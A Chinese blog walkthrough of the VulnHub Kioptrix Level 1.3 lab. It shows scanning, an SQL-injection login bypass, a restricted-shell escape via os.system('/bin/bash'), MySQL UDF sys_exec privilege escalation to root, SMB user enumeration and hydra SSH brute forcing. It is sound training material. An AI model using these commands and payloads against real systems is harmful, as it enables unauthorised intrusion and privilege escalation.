2023-09-24 18:52:10">2023-09-24</time><span class="post-meta-separator"></span><i class="anzhiyufont anzhiyu-icon-history post-meta-icon"></i><span class="post-meta-label">更新于</span><time class="post-meta-date-updated" itemprop="dateCreated datePublished" datetime="2023-09-25T11:19:12.079Z" title="更新于 2023-09-25 19:19:12">2023-09-25</time></span></div><div class="meta-secondline"><span class="post-meta-separator"></span><span class="post-meta-wordcount"><i class="anzhiyufont anzhiyu-icon-file-word post-meta-icon" title="文章字数"></i><span class="post-meta-label" title="文章字数">字数总计:</span><span class="word-count" title="文章字数">3.7k</span><span class="post-meta-separator"></span><i class="anzhiyufont anzhiyu-icon-clock post-meta-icon" title="阅读时长"></i><span class="post-meta-label" title="阅读时长">阅读时长:</span><span>14分钟</span></span><span class="post-meta-separator"></span><span class="post-meta-pv-cv" id="" data-flag-title="vulnhub-kioptrix_level 1.3"><i class="anzhiyufont anzhiyu-icon-fw-eye post-meta-icon"></i><span class="post-meta-label" title="阅读量">阅读量:</span><span id="busuanzi_value_page_pv"><i class="anzhiyufont anzhiyu-icon-spinner anzhiyu-spin"></i></span></span><span class="post-meta-separator">       </span><span class="post-meta-position" title="作者IP属地为太原"><i class="anzhiyufont anzhiyu-icon-location-dot"></i>太原</span><span class="post-meta-separator"></span><span class="post-meta-commentcount"><i class="anzhiyufont anzhiyu-icon-comments post-meta-icon"></i><span class="post-meta-label">评论数:</span><a href="/2023/09/24/kioptrix-level-1.3/#post-comment" itemprop="discussionUrl"><span class="valine-comment-count" data-xid="/2023/09/24/kioptrix-level-1.3/" itemprop="commentCount"><i class="anzhiyufont anzhiyu-icon-spinner anzhiyu-spin"></i></span></a></span></div></div></div><section class="main-hero-waves-area waves-area"><svg class="waves-svg" xmlns="http://www.w3.org/2000/svg" xlink="http://www.w3.org/1999/xlink" viewBox="0 24 150 28" preserveAspectRatio="none" shape-rendering="auto"><defs><path id="gentle-wave" d="M -160 44 c 30 0 58 -18 88 -18 s 58 18 88 18 s 58 -18 88 -18 s 58 18 88 18 v 44 h -352 Z"></path></defs><g class="parallax"><use href="#gentle-wave" x="48" y="0"></use><use href="#gentle-wave" x="48" y="3"></use><use href="#gentle-wave" x="48" y="5"></use><use href="#gentle-wave" x="48" y="7"></use></g></svg></section><div id="post-top-cover"><img class="nolazyload" id="post-top-bg" src=""></div></header><main id="blog-container"><div class="layout" id="content-inner"><div id="post"><article class="post-content" id="article-container" itemscope itemtype="http://hybcx.xyz/2023/09/24/kioptrix-level-1.3/"><header><a class="post-meta-categories" href="/categories/vulnhub%E7%B3%BB%E5%88%97/" itemprop="url">vulnhub系列</a><a href="/tags/%E5%86%85%E7%BD%91%E9%9D%B6%E5%9C%BA/" tabindex="-1" itemprop="url">内网靶场</a><h1 id="CrawlerTitle" itemprop="name headline">vulnhub-kioptrix_level 1.3</h1><span itemprop="author" itemscope itemtype="http://schema.org/Person">hybcx</span><time itemprop="dateCreated datePublished" datetime="2023-09-24T10:52:10.155Z" title="发表于 2023-09-24 18:52:10">2023-09-24</time><time itemprop="dateCreated datePublished" datetime="2023-09-25T11:19:12.079Z" title="更新于 2023-09-25 19:19:12">2023-09-25</time></header><h1 id="0x01-靶场信息">0x01 靶场信息</h1>
<pre><code class="hljs plaintext">地址：https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
发布日期：2010 年 2 月 17 日
难度：容易
目标：获取root shell

描述：This Kioptrix VM Image are easy challenges. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games are to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways then one to successfully complete the challenges.

Source: http://www.kioptrix.com/blog/?page_id=135
Source: http://www.kioptrix.com/blog/?p=49</code></pre>
<p>![image-20230924185658114](kioptrix_level 1.3/image-20230924185658114.png)</p>
<p>这里在搭建也是费点脑子，这里如上图下载好rar包之后发现只有一个vmdx的文件，这里需要我们先在虚拟机上创建一个空的</p>
<p>![image-20230924185745215](kioptrix_level 1.3/image-20230924185745215.png)</p>
<p>![image-20230924185756615](kioptrix_level 1.3/image-20230924185756615.png)</p>
<p>这里选择其他即可</p>
<p>![image-20230924185811593](kioptrix_level 1.3/image-20230924185811593.png)</p>
<p>这里放在合适的地方，安装好后进入虚拟机设置中，将原先的硬盘删除掉，换成我们下载好的vmdx文件即可</p>
<p>![image-20230924185924521](kioptrix_level 1.3/image-20230924185924521.png)</p>
<p>下载好打开即可，可能再打开的时候会报错，他会提示让我们换成如下图的配置</p>
<p>![image-20230924190011738](kioptrix_level 1.3/image-20230924190011738.png)</p>
<p>我们照做即可</p>
<h1 id="0x02-信息收集">0x02 信息收集</h1>
<h2 id="探测存活主机">探测存活主机</h2>
<pre><code class="hljs plaintext">netdiscover -r 192.168.17.0/24</code></pre>
<p>![image-20230924191700887](kioptrix_level 1.3/image-20230924191700887.png)</p>
<p>那目标机就是<code>192.168.17.145</code>了</p>
<h2 id="端口扫描">端口扫描</h2>
<pre><code class="hljs plaintext">nmap -sS -sV -A -p 1-65535 192.168.17.143</code></pre>
<p>![image-20230924192157892](kioptrix_level 1.3/image-20230924192157892.png)</p>
<p>可以看到有如上四个端口的开启，我们先访问80看看</p>
<p>![image-20230924192223848](kioptrix_level 1.3/image-20230924192223848.png)</p>
<p>如图是一个登录平台，我们先看一下web目录</p>
<h2 id="web目录扫描">web目录扫描</h2>
<pre><code class="hljs plaintext">dirsearch -u "http://192.168.17.145" -x 400-599 -t 50</code></pre>
<pre><code class="hljs php">Target: http:<span class="hljs-comment">//192.168.17.145/</span>

[<span class="hljs-number">19</span>:<span class="hljs-number">25</span>:<span class="hljs-number">29</span>] Starting: 
[<span class="hljs-number">19</span>:<span class="hljs-number">25</span>:<span class="hljs-number">51</span>] <span class="hljs-number">200</span> -  <span class="hljs-number">109</span>B  - /checklogin
[<span class="hljs-number">19</span>:<span class="hljs-number">25</span>:<span class="hljs-number">52</span>] <span class="hljs-number">200</span> -  <span class="hljs-number">109</span>B  - /checklogin.php
[<span class="hljs-number">19</span>:<span class="hljs-number">25</span>:<span class="hljs-number">54</span>] <span class="hljs-number">200</span> -  <span class="hljs-number">298</span>B  - /database.sql
[<span class="hljs-number">19</span>:<span class="hljs-number">26</span>:<span class="hljs-number">00</span>] <span class="hljs-number">200</span> -  <span class="hljs-number">933</span>B  - /images/
[<span class="hljs-number">19</span>:<span class="hljs-number">26</span>:<span class="hljs-number">01</span>] <span class="hljs-number">301</span> -  <span class="hljs-number">356</span>B  - /images  -&gt;  http:<span class="hljs-comment">//192.168.17.145/images/</span>
[<span class="hljs-number">19</span>:<span class="hljs-number">26</span>:<span class="hljs-number">01</span>] <span class="hljs-number">200</span> -    <span class="hljs-number">1</span>KB - /index.php
[<span class="hljs-number">19</span>:<span class="hljs-number">26</span>:<span class="hljs-number">02</span>] <span class="hljs-number">200</span> -    <span class="hljs-number">1</span>KB - /index.php/login/
[<span class="hljs-number">19</span>:<span class="hljs-number">26</span>:<span class="hljs-number">02</span>] <span class="hljs-number">200</span> -    <span class="hljs-number">1</span>KB - /index
[<span class="hljs-number">19</span>:<span class="hljs-number">26</span>:<span class="hljs-number">05</span>] <span class="hljs-number">302</span> -    <span class="hljs-number">0</span>B  - /logout  -&gt;  index.php
[<span class="hljs-number">19</span>:<span class="hljs-number">26</span>:<span class="hljs-number">05</span>] <span class="hljs-number">302</span> -    <span class="hljs-number">0</span>B  - /logout.php  -&gt;  index.php
[<span class="hljs-number">19</span>:<span class="hljs-number">26</span>:<span class="hljs-number">05</span>] <span class="hljs-number">302</span> -    <span class="hljs-number">0</span>B  - /logout/  -&gt;  index.php
[<span class="hljs-number">19</span>:<span class="hljs-number">26</span>:<span class="hljs-number">07</span>] <span class="hljs-number">302</span> -  <span class="hljs-number">220</span>B  - /member  -&gt;  index.php
[<span class="hljs-number">19</span>:<span class="hljs-number">26</span>:<span class="hljs-number">07</span>] <span class="hljs-number">302</span> -  <span class="hljs-number">220</span>B  - /member/login.jsp  -&gt;  index.php
[<span class="hljs-number">19</span>:<span class="hljs-number">26</span>:<span class="hljs-number">07</span>] <span class="hljs-number">302</span> -  <span class="hljs-number">220</span>B  - /member/login.aspx  -&gt;  index.php
[<span class="hljs-number">19</span>:<span class="hljs-number">26</span>:<span class="hljs-number">07</span>] <span class="hljs-number">302</span> -  <span class="hljs-number">220</span>B  - /member/logon  -&gt;  index.php
[<span class="hljs-number">19</span>:<span class="hljs-number">26</span>:<span class="hljs-number">07</span>] <span class="hljs-number">302</span> -  <span class="hljs-number">220</span>B  - /member/login.rb  -&gt;  index.php
[<span class="hljs-number">19</span>:<span class="hljs-number">26</span>:<span class="hljs-number">07</span>] <span class="hljs-number">302</span> -  <span class="hljs-number">220</span>B  - /member/login.html  -&gt;  index.php
[<span class="hljs-number">19</span>:<span class="hljs-number">26</span>:<span class="hljs-number">07</span>] <span class="hljs-number">302</span> -  <span class="hljs-number">220</span>B  - /member/  -&gt;  index.php
[<span class="hljs-number">19</span>:<span class="hljs-number">26</span>:<span class="hljs-number">07</span>] <span class="hljs-number">302</span> -  <span class="hljs-number">220</span>B  - /member/login  -&gt;  index.php
[<span class="hljs-number">19</span>:<span class="hljs-number">26</span>:<span class="hljs-number">07</span>] <span class="hljs-number">302</span> -  <span class="hljs-number">220</span>B  - /member/admin.asp  -&gt;  index.php
[<span class="hljs-number">19</span>:<span class="hljs-number">26</span>:<span class="hljs-number">07</span>] <span class="hljs-number">302</span> -  <span class="hljs-number">220</span>B  - /member/login.py  -&gt;  index.php
[<span class="hljs-number">19</span>:<span class="hljs-number">26</span>:<span class="hljs-number">07</span>] <span class="hljs-number">302</span> -  <span class="hljs-number">220</span>B  - /member/login.php  -&gt;  index.php
[<span class="hljs-number">19</span>:<span class="hljs-number">26</span>:<span class="hljs-number">07</span>] <span class="hljs-number">302</span> -  <span class="hljs-number">220</span>B  - /member/login.js  -&gt;  index.php
[<span class="hljs-number">19</span>:<span class="hljs-number">26</span>:<span class="hljs-number">07</span>] <span class="hljs-number">302</span> -  <span class="hljs-number">220</span>B  - /member.php  -&gt;  index.php
[<span class="hljs-number">19</span>:<span class="hljs-number">26</span>:<span class="hljs-number">07</span>] <span class="hljs-number">302</span> -  <span class="hljs-number">220</span>B  - /member/signin  -&gt;  index.php
[<span class="hljs-number">19</span>:<span class="hljs-number">26</span>:<span class="hljs-number">07</span>] <span class="hljs-number">302</span> -  <span class="hljs-number">220</span>B  - /member/login.asp  -&gt;  index.php</code></pre>
<p>测试一番发现如下信息：</p>
<p>database.sql：</p>
<pre><code class="hljs sql"><span class="hljs-keyword">CREATE</span> <span class="hljs-keyword">TABLE</span> `members` (
`id` <span class="hljs-type">int</span>(<span class="hljs-number">4</span>) <span class="hljs-keyword">NOT</span> <span class="hljs-keyword">NULL</span> auto_increment,
`username` <span class="hljs-type">varchar</span>(<span class="hljs-number">65</span>) <span class="hljs-keyword">NOT</span> <span class="hljs-keyword">NULL</span> <span class="hljs-keyword">default</span> <span class="hljs-string">''</span>,
`password` <span class="hljs-type">varchar</span>(<span class="hljs-number">65</span>) <span class="hljs-keyword">NOT</span> <span class="hljs-keyword">NULL</span> <span class="hljs-keyword">default</span> <span class="hljs-string">''</span>,
<span class="hljs-keyword">PRIMARY</span> KEY (`id`)
) TYPE<span class="hljs-operator">=</span>MyISAM AUTO_INCREMENT<span class="hljs-operator">=</span><span class="hljs-number">2</span> ;

<span class="hljs-comment">-- </span>
<span class="hljs-comment">-- Dumping data for table `members`</span>
<span class="hljs-comment">-- 	</span>

<span class="hljs-keyword">INSERT</span> <span class="hljs-keyword">INTO</span> `members` <span class="hljs-keyword">VALUES</span> (<span class="hljs-number">1</span>, <span class="hljs-string">'john'</span>, <span class="hljs-string">'1234'</span>);</code></pre>
<p>估计是sql注入了</p>
<h2 id="web网站指纹扫描">web网站指纹扫描</h2>
<pre><code class="hljs plaintext">whatweb http://192.168.17.145</code></pre>
<p>![image-20230924193046254](kioptrix_level 1.3/image-20230924193046254.png)</p>
<p>此处似乎没什么重要信息，但回过头来看了看sql泄露的信息</p>
<h1 id="0x03-漏洞发现及利用">0x03 漏洞发现及利用</h1>
<h2 id="万能密码登录获取用户信息">万能密码登录获取用户信息</h2>
<pre><code class="hljs plaintext">INSERT INTO `members` VALUES (1, 'john', '1234');</code></pre>
<p>我瞬间就认为这可能是登录页面的信息，但试了试没啥用，接着便没思路了，于是看了wp发现是我的dirsearch扫的不行，使用kali自带的dirb竟然还能扫到一个john后缀的url。。。。话不多说我们访问看看</p>
<p>![image-20230924195229960](kioptrix_level 1.3/image-20230924195229960.png)</p>
<p>![image-20230924195250034](kioptrix_level 1.3/image-20230924195250034.png)</p>
<p>![image-20230924195507516](kioptrix_level 1.3/image-20230924195507516.png)</p>
<p>好吧没什么卵用，接着wp说尝试弱口令，但我之前也尝试了却没成功，还是怪自己经验少而且没耐心吧┭┮﹏┭┮</p>
<p>然后我跟着教程走，发现还是不行？？？结果换一个浏览器就好了，真实玄学，看来又多了一个经验</p>
<pre><code class="hljs plaintext">john
'or'1'='1</code></pre>
<p>我们输入如上信息，即可得到用户信息</p>
<p>![image-20230924200000467](kioptrix_level 1.3/image-20230924200000467.png)</p>
<p>接下来我又不知道干嘛了，要不是看wp我又忘了可以尝试一下ssh连接的。。。</p>
<p>![image-20230924200233909](kioptrix_level 1.3/image-20230924200233909.png)</p>
<p>但成功登陆之后奇怪的是什么命令也不能执行。。。，仔细一看发现这里似乎是自定义了一些命令符</p>
<p>![image-20230924200358200](kioptrix_level 1.3/image-20230924200358200.png)</p>
<p>如图输入?或者help能查看可以使用什么命令，不过 还是很鸡肋，我用遍了也不知道有啥有效信息，看了wp发现又是知识盲区了，他这里采用了一种提权方法，其实我也应该往这里想的，即使我不会，但得有想法</p>
<h2 id="mysql-udf-提权">mysql-udf 提权</h2>
<pre><code class="hljs bash"><span class="hljs-built_in">echo</span> os.system(<span class="hljs-string">"/bin/bash"</span>) <span class="hljs-comment">#输出bash命令行</span>
<span class="hljs-built_in">cd</span> /var/www
<span class="hljs-built_in">cat</span> checklogin.php</code></pre>
<p>![image-20230924201147686](kioptrix_level 1.3/image-20230924201147686.png)</p>
<p>因为菜的缘故，我不理解他echo命令的操作原理，于是GPT问了一番，果然AI就是好，百度没找到的，我一下子就透彻了</p>
<pre><code class="hljs plaintext">这行代码看起来是用Python的`os.system`函数在Linux系统中执行了一个命令`/bin/bash`。让我来解释一下：

1. `echo`: 这是一个Linux命令，用于在终端中打印文本。在这里，它被用作一个外部命令，会打印`os.system("/bin/bash")`这个字符串到终端。

2. `os.system("/bin/bash")`: 这部分是Python代码，它调用了`os.system`函数，该函数用于在操作系统中执行外部命令。在这里，传递给`os.system`函数的参数是`"/bin/bash"`，这是一个Linux系统中的命令解释器，也就是Bash Shell。

综合起来，这行代码的作用是在Linux系统中打印字符串`os.system("/bin/bash")`到终端，并尝试执行`/bin/bash`，也就是启动一个新的Bash Shell进程。这样，如果运行这段代码，你将会看到该字符串被打印到终端，并且你会进入一个新的Bash Shell，可以在其中执行其他命令和操作。请注意，执行这段代码需要足够的权限，因为它尝试启动一个新的Shell。这种代码使用得当，可以用于调用其他系统命令，但也需要小心，以免滥用或造成安全问题。</code></pre>
<p>以上为GPT回答，总的来说，echo命令行调用了system命令来执行/bin/bash，于是启动了一个新的shell进程，恰好启动之后我们便可以使用更多的linux系统命令了—理解止步于此，请佬们嘴下留情┭┮﹏┭┮</p>
<p>这里 跟着步骤看一个check源码</p>
<pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span>
<span class="hljs-title function_ invoke__">ob_start</span>();
<span class="hljs-variable">$host</span>=<span class="hljs-string">"localhost"</span>; <span class="hljs-comment">// Host name</span>
<span class="hljs-variable">$username</span>=<span class="hljs-string">"root"</span>; <span class="hljs-comment">// Mysql username</span>
<span class="hljs-variable">$password</span>=<span class="hljs-string">""</span>; <span class="hljs-comment">// Mysql password</span>
<span class="hljs-variable">$db_name</span>=<span class="hljs-string">"members"</span>; <span class="hljs-comment">// Database name</span>
<span class="hljs-variable">$tbl_name</span>=<span class="hljs-string">"members"</span>; <span class="hljs-comment">// Table name</span>

<span class="hljs-comment">// Connect to server and select databse.</span>
<span class="hljs-title function_ invoke__">mysql_connect</span>(<span class="hljs-string">"<span class="hljs-subst">$host</span>"</span>, <span class="hljs-string">"<span class="hljs-subst">$username</span>"</span>, <span class="hljs-string">"<span class="hljs-subst">$password</span>"</span>)<span class="hljs-keyword">or</span> <span class="hljs-keyword">die</span>(<span class="hljs-string">"cannot connect"</span>);
<span class="hljs-title function_ invoke__">mysql_select_db</span>(<span class="hljs-string">"<span class="hljs-subst">$db_name</span>"</span>)<span class="hljs-keyword">or</span> <span class="hljs-keyword">die</span>(<span class="hljs-string">"cannot select DB"</span>);

<span class="hljs-comment">// Define $myusername and $mypassword</span>
<span class="hljs-variable">$myusername</span>=<span class="hljs-variable">$_POST</span>[<span class="hljs-string">'myusername'</span>];
<span class="hljs-variable">$mypassword</span>=<span class="hljs-variable">$_POST</span>[<span class="hljs-string">'mypassword'</span>];

<span class="hljs-comment">// To protect MySQL injection (more detail about MySQL injection)</span>
<span class="hljs-variable">$myusername</span> = <span class="hljs-title function_ invoke__">stripslashes</span>(<span class="hljs-variable">$myusername</span>);
<span class="hljs-comment">//$mypassword = stripslashes($mypassword);</span>
<span class="hljs-variable">$myusername</span> = <span class="hljs-title function_ invoke__">mysql_real_escape_string</span>(<span class="hljs-variable">$myusername</span>);
<span class="hljs-comment">//$mypassword = mysql_real_escape_string($mypassword);</span>

<span class="hljs-comment">//$sql="SELECT * FROM $tbl_name WHERE username='$myusername' and password='$mypassword'";</span>
<span class="hljs-variable">$result</span>=<span class="hljs-title function_ invoke__">mysql_query</span>(<span class="hljs-string">"SELECT * FROM <span class="hljs-subst">$tbl_name</span> WHERE username='<span class="hljs-subst">$myusername</span>' and password='<span class="hljs-subst">$mypassword</span>'"</span>);
<span class="hljs-comment">//$result=mysql_query($sql);</span>

<span class="hljs-comment">// Mysql_num_row is counting table row</span>
<span class="hljs-variable">$count</span>=<span class="hljs-title function_ invoke__">mysql_num_rows</span>(<span class="hljs-variable">$result</span>);
<span class="hljs-comment">// If result matched $myusername and $mypassword, table row must be 1 row</span>

<span class="hljs-keyword">if</span>(<span class="hljs-variable">$count</span>!=<span class="hljs-number">0</span>){
<span class="hljs-comment">// Register $myusername, $mypassword and redirect to file "login_success.php"</span>
        <span class="hljs-title function_ invoke__">session_register</span>(<span class="hljs-string">"myusername"</span>);
        <span class="hljs-title function_ invoke__">session_register</span>(<span class="hljs-string">"mypassword"</span>);
        <span class="hljs-title function_ invoke__">header</span>(<span class="hljs-string">"location:login_success.php?username=<span class="hljs-subst">$myusername</span>"</span>);
}
<span class="hljs-keyword">else</span> {
<span class="hljs-keyword">echo</span> <span class="hljs-string">"Wrong Username or Password"</span>;
<span class="hljs-keyword">print</span>(<span class="hljs-string">'&lt;form method="link" action="index.php"&gt;&lt;input type=submit value="Try Again"&gt;&lt;/form&gt;'</span>);
}

<span class="hljs-title function_ invoke__">ob_end_flush</span>();
<span class="hljs-meta">?&gt;</span></code></pre>
<p>可以看到上述代码只对username做了参数过滤，并没有限制password，这也是万能密码成功的原因，并且我们也可以看到数据库配置信息，看了wp，发现接下来就可以想到mysql数据库提权了</p>
<p>由于不熟悉mysql命令，就cv过来了</p>
<p>![image-20230924202012411](kioptrix_level 1.3/image-20230924202012411.png)</p>
<p>这里登录的时候密码默认为空，接下来佬又毫无理由的输入了一下命令，┭┮﹏┭┮</p>
<pre><code class="hljs sql">mysql <span class="hljs-operator">-</span>uroot <span class="hljs-operator">-</span>p
<span class="hljs-keyword">select</span> sys_exec("usermod -aG admin john");
exit</code></pre>
<p>以下是GPT 回答</p>
<pre><code class="hljs plaintext">select: 这是一个 SQL 查询语句的起始部分，表示你要执行一个查询操作。通常，select 用于从数据库中检索数据。

sys_exec("usermod -aG admin john"): 这是一个 SQL 查询中的函数调用，其中调用了一个名为 sys_exec 的自定义函数，并传递了一个参数 "usermod -aG admin john" 给该函数。根据函数名和参数的形式，可以推断出这个函数的作用是执行系统命令。

"usermod -aG admin john" 是一个 Linux 系统命令，用于将用户 john 添加到 admin 用户组。这个命令通常用于管理用户和用户组的权限。
如果你的数据库支持并配置了 sys_exec 函数，并且具有足够的权限来执行系统命令，那么执行这个 SQL 查询将尝试执行 usermod -aG admin john 命令，将用户 john 添加到 admin 用户组中。</code></pre>
<p>我们发现执行如上命令便可以将john加入到admin用户组了</p>
<p>![image-20230924202337538](kioptrix_level 1.3/image-20230924202337538.png)</p>
<p>顺便解释一下上述命令各个参数的含义，我也复习复习，GPT回答：</p>
<pre><code class="hljs plaintext">当解释命令 `usermod -aG admin john` 时，我们需要分解和解释各个参数的含义：

1. `usermod`: 这是一个 Linux 命令，用于修改用户帐户的属性。它的主要功能是管理用户帐户的属性，例如更改用户名、密码、家目录等。

2. `-aG`: 这是 `usermod` 命令的选项和参数，具体含义如下：

   - `-a`: 这个选项表示追加（append）。当与 `-G` 选项一起使用时，它指示将用户添加到一个或多个附加的用户组中，而不会将其从其他组中删除。如果省略了 `-a` 选项，用户将被从其他组中移除，并且只会属于新指定的组。

   - `-G admin`: 这个部分表示将用户添加到名为 `admin` 的用户组中。在 Linux 中，用户可以同时属于一个或多个用户组。这个命令将用户 `john` 添加到 `admin` 用户组，这可能用于授予用户 `john` 某些管理员权限或访问某些系统资源的权限。

3. `john`: 这是要修改的用户的用户名。在这种情况下，`usermod` 命令将对用户名为 `john` 的用户执行操作。

综合起来，这个命令的含义是将用户 `john` 添加到 `admin` 用户组，而不会从任何其他组中删除他。这通常用于管理用户的权限，以便他可以访问 `admin` 组的资源或执行需要 `admin` 组权限的操作，而不影响其在其他组的成员资格。</code></pre>
<h2 id="找到flag">找到flag</h2>
<pre><code class="hljs sql">sudo su root 
密码：MyNameIsJohn
cd <span class="hljs-operator">~</span>
cat congrats.txt</code></pre>
<p>![image-20230924202451357](kioptrix_level 1.3/image-20230924202451357.png)</p>
<h1 id="0x04-靶场总结">0x04 靶场总结</h1>
<h2 id="靶场echo命令探索">靶场echo命令探索</h2>
<p>本着对知识的渴望与对自己学习的负责，我继续搜寻了上述<code>echo os.system("/bin/bash")</code>的含义，功夫不负有心人，我发现在此次靶场环境中，之所以当前用户使用的命令极其有限，是因为他处于一个lshell的环境，看这意思应该是limit shell</p>
<p>对其简单的介绍：</p>
<pre><code class="hljs plaintext">Linux受限shell软件lshell限制用户行为：
有时我们需要限制登录到Linux系统用户的行为，最简单的办法莫过于限制其所能执行的命令。
Lshell是另一款可以实现这个功能的软件，是由Python编写。</code></pre>
<p>接着搜了半天如何"突破受限制的shell环境"发现都没有包含上述方法，也就放弃了，只需将此方法记住吧。</p>
<h2 id="nikto漏扫初识">nikto漏扫初识</h2>
<p>在这里我发现有篇文章用的是nikto方法，这里我也没接触过，于是简单了解了一下</p>
<pre><code class="hljs plaintext">Nikto是一个开源的WEB扫描评估软件，可以对Web服务器进行多项安全测试，能在230多种服务器上扫描出 2600多种有潜在危险的文件、CGI及其他问题。Nikto使用Perl语言编写运行，Nikto可以扫描指定主机的WEB类型、主机名、指定目录、特定CGI漏洞、返回主机允许的 http模式等.</code></pre>
<p>具体可以参考：<a target="_blank" rel="noopener" href="https://blog.csdn.net/liver100day/article/details/121392509?ops_request_misc=&amp;request_id=&amp;biz_id=102&amp;utm_term=nikto%E5%91%BD%E4%BB%A4&amp;utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduweb~default-3-121392509.142%5Ev94%5Einsert_down1&amp;spm=1018.2226.3001.4187">Web漏洞扫描神器Nikto使用指南</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_44257023/article/details/120932630?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522169556019516800211521730%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&amp;request_id=169556019516800211521730&amp;biz_id=0&amp;utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduend~default-1-120932630-null-null.142%5Ev94%5Einsert_down1&amp;utm_term=%E4%BB%80%E4%B9%88%E6%98%AFnikto&amp;spm=1018.2226.3001.4187">Kali-扫描工具-Nikto使用</a></p>
<h2 id="smb-枚举">SMB  枚举</h2>
<p>这里又发现一个新姿势</p>
<p>根据端口信息发现存在 SMB 服务，使用 enum4linux 对其进行枚举：<code>enum4linux 192.168.17.145</code></p>
<p>![image-20230924210740235](kioptrix_level 1.3/image-20230924210740235.png)</p>
<p>很神奇，直接发现了三个用户</p>
<p>未获取到 smb 版本号，但枚举出用户名：root、robert、john、loneferret</p>
<p>你以为就这样结束了？</p>
<p>用户名也可通过 nmap 进行枚举：<code>nmap -T4 --script=smb-enum-users 192.168.17.145</code></p>
<p>![image-20230924210912765](kioptrix_level 1.3/image-20230924210912765.png)</p>
<p>接着佬又执行如下操作</p>
<p>尝试对四个账户进行 ssh 暴破： <code>hydra -L u.txt -P /usr/share/seclists/Passwords/xato-net-10-million-passwords-1000.txt 192.168.146.132 ssh</code></p>
<p>暴破失败，此思路仅供参考。</p>
<p>还有一点，便是在此之前的sql注入漏洞中，我们尝试在用户名或者密码处添加单引号会发现页面会有报错信息，这时候就应该极度注意了，但我却没有┭┮﹏┭┮</p>
<h1 id="0x05-文章总结">0x05 文章总结</h1>
<p>总的来说，在此次靶场中思路依旧用上一个靶场，框架并没发生大的改变，但令我印象深刻的有：</p>
<pre><code class="hljs plaintext">1. 各种工具的使用（都未见过）比如nikto漏扫，SMB服务枚举处用户名，甚至nmap也可以枚举，唉还是太菜，什么都不知道，接着浅浅了解了一下hydra的ssh密码爆破

2. 这里便是网站的手工漏洞判断了，这次给我的教训有，一定一定要关注任何登录框，因为他极有可能存在sql注入，倘若没有发现，那大概率也是因为我菜不会判断，而这次的sql漏洞中，明明我都手工测试的时候看到了页面的报错信息，但我却选择无视，其实这已经说明了存在sql注入。

3. 同时这也有在提示我，未来要学会去搭建配置属于自己的强大字典，不然就学会利用各种扫描工具来间接丰富字典内容。不过前者肯定更完美。

4. 最后便是一些提权类的内容，这令我有点头疼，但即使知识体系庞大，我也不可退缩，比如这次边了解到了，如何突破受限制的shell环境、以及mysql的udf提权。虽然本文未做介绍但我会记录一下学习的文章，在此之后进行学习。</code></pre>
<p>我将在下次靶场之前进一步学习udf提权以及逃逸restricted shell</p>
<h1 id="0x06-参考文章">0x06 参考文章</h1>
<p><a target="_blank" rel="noopener" href="https://blog.51cto.com/u_15127538/2716174">渗透技巧——如何逃逸Linux的受限制shell执行任意命令</a></p>
<p><a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/network/197647.html">CTF靶场系列-Kioptrix全集</a></p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/xiaowenxu/p/16694080.html">[CTF靶场之Kioptrix: Level 1.3]</a></p>
<p><a target="_blank" rel="noopener" href="https://www.z0sen.me/archives/kioptrix-level-1-3">Kioptrix: Level 1.3</a>  --极度推荐</p>
<p><a target="_blank" rel="noopener" href="https://steflan-security.com/vulnhub-kioptrix-level-1-3-walkthrough/">VulnHub – Kioptrix：1.3 级演练</a></p>
</article><div class="post-copyright"><div class="copyright-cc-box"><i class="anzhiyufont anzhiyu-icon-copyright"></i></div><div class="post-copyright__author_box"><a class="post-copyright__author_img" href="/" title="头像"><img class="post-copyright__author_img_back" src= "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" onerror="this.onerror=null,this.src=&quot;/img/404.jpg&quot;" data-lazy-src="https://bu.dusays.com/2023/04/27/64496e511b09c.jpg" title="头像" alt="头像"><img class="post-copyright__author_img_front" src= "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" onerror="this.onerror=null,this.src=&quot;/img/404.jpg&quot;" data-lazy-src="https://bu.dusays.com/2023/04/27/64496e511b09c.jpg" title="头像" alt="头像"></a><div class="post-copyright__author_name">hybcx</div><div class="post-copyright__author_desc">只需热爱, 未来可期！</div></div><div class="post-copyright__post__info"><a class="post-copyright__original" title="该文章为原创文章，注意版权协议" href="http://hybcx.xyz/2023/09/24/kioptrix-level-1.3/">原创</a><a class="post-copyright-title"><span onclick="rm.copyPageUrl('http://hybcx.xyz/2023/09/24/kioptrix-level-1.3/')">vulnhub-kioptrix_level 1.3</span></a></div><div class="post-tools" id="post-tools"><div class="post-tools-left"><div class="rewardLeftButton"></div><div class="shareRight"><div class="share-link mobile"><div class="share-qrcode"><div class="share-button" title="使用手机访问这篇文章"><i class="anzhiyufont anzhiyu-icon-qrcode"></i></div><div class="share-main"><div class="share-main-all"><div id="qrcode" title="http://hybcx.xyz/2023/09/24/kioptrix-level-1.3/"></div><div class="reward-dec">使用手机访问这篇文章</div></div></div></div></div><div class="share-link weibo"><a class="share-button" target="_blank" href="https://service.weibo.com/share/share.php?title=vulnhub-kioptrix_level 1.3&amp;url=http://hybcx.xyz/2023/09/24/kioptrix-level-1.3/&amp;pic=" rel="external nofollow noreferrer noopener"><i class="anzhiyufont anzhiyu-icon-weibo"></i></a></div><script>function copyCurrentPageUrl() {
  var currentPageUrl = window.location.href;
  var input = document.createElement("input");
  input.setAttribute("value", currentPageUrl);
  document.body.appendChild(input);
  input.select();
  input.setSelectionRange(0, 99999);
  document.execCommand("copy");
  document.body.removeChild(input);
